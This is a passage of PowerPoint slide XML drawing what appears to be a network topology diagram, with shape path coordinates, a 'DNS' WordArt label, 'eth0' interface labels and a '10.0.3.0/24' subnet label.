                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9286" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58CC6008-71FA-F2BD-391D-362ECFDF8D11}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9287" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E82B8F4-7243-CCE7-E3B3-3C3EA24D487D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0" err="1"/>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9288" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B8E2A2C-4F10-CF1A-B4A9-C6BD53870C8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3087815" y="3547893"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9289" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E1C573-61A8-94C6-A74A-E6542949D26C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9290" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BC4F817-20B3-1728-4BEB-9734C8986009}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9291" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40562160-B9D4-68AA-BC83-8A373C7E076D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3109411" y="4016212"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9292" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3175C2-881A-5E36-5A32-EB04121611E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9293" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF3BF253-7AEF-3EBE-A5FC-4249CB82AE41}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9295" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0878E97B-B026-CE8F-2AC7-34E28C691F57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076643" y="3780075"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9296" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF93EA8F-C55D-4CAB-9ADF-2DA45F950ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3712201" y="3761897"/>
            <a:ext cx="1066318" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10.0.3.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9300" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{991019C6-902B-1002-417E-49382A291A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1245708" y="2923524"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9302" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B64CFD6-BA4C-4303-5968-C9BBA9A7571F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4936638" y="5924428"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9303" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96ABC08E-DE60-5197-A698-B5B1CA419E33}"/>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52" y="1064"/>
              <a:ext cx="573"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304" name="Text Box 106">
              <a:extLst>
